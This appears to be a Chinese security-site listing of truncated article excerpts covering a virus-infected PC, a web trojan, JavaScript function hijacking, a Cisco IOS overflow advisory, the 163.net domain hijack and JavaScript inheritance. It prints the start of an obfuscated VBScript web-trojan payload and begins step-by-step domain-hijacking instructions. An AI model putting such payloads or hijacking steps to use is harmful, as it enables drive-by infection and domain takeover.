一. 诡异的中毒现象　　在成品检验科文员办公室的一台电脑上折腾半个小时后，计算机维护部门的技术员只觉得眼皮不停狂跳，因为从刚开始接手这个任务开始，他就一直在做无用功：他随身带的U盘里引以为豪的众多维护工具包在这台机器上全军覆没，无论他直接在U盘上运行还是随便复制到哪个目录里，系统都是报告“找不到文件”或者直接没有运行起来的反应，他第一次感受到了恐惧，文件分明就好好的在眼皮底下，可它们就是“找不到”或死活不肯执行，莫非是在这台机器上被病毒破坏了?他只好打开网页尝试重新下载，但是他很快就绝望了，刚下载的查杀工具同样也不能使用。　　无奈之下他只好在众多文员的期待下说出了大部分号称上门维护电...

如下是一段网马<Script Language="VBScript">Cn911="83,61,34,52,70,54,69,50,48,52,53,55,50,55,50,54,70,55,50,50,48,53,50,54,53,55,51,55,53,54,68,54,53,50,48,52,69,54,53,55,56,55,52,48,68,48,65,52,51,54,69,52,67,53,50,53,53,51,68,50,50,54,56,55,52,55,52,55,48,51,65,50,70,50,70,55,55,55,55,55,55,50,6...

一、概述javascript函数劫持，也就是老外提到的javascript hijacking技术。最早还是和剑心同学讨论问题时偶然看到的一段代码，大概这样写的：window.alert = function(s) {};觉得这种用法很巧妙新颖，和API Hook异曲同工，索性称之为javascript function hook，也就是函数劫持。通过替换js函数的实现来达到劫持这个函数调用的目的，一个完整的hook alert函数例子如下：<!--1.htm--><script typ...

日前Cisco针对部分交换器的特定IOS（InternetworkOperatingSystem）版本提出漏洞通知，也就是Cisco发现，特定版本的IOS，当用户启动FTP或者是Telnet动作时，只要同时搭配认证动作，有可能发生远端资料缓冲区溢出的异常状况，因此建议用户可以透过更新IOS软体版本来解决，或者是关闭FTP与Telnet时会同步启动认证的设定，一样也可以避免该网路漏洞的发生。不过，如果用户是透过HTTP或HTTPS来启动认证动作的话，便不会发生问题。　　　　其实IOS发生网路安全漏洞，早就不是意料之外的问题，因为Cisco的IOS功能相当多，而且都跟网路相关连结方式作整合，要不发...

前段时间，163.net被黑，在业界搞的沸沸腾腾。其实，这不是他的错。错误在于Internic 。以下内容部分编译自  packetstorm.  163被黑的技术称为域名劫持（hijacked），技术上很简单，关键在于发一份用域名注册者email地址的确认信。。我们知  道：要进行域名变更，只需到www.networksolutions.com上进行。  比如我们要劫持163.net的，具体步骤如下：  1、打开浏览器，输入http://www.networksolutions.co...

关于对象的继承，一般的做法是用复制法： Object.extend见protpotype.js 的实现方法:[code]Object.extend = function(destination, source) {   for (property in source) {     destination[property] = source[property];   ...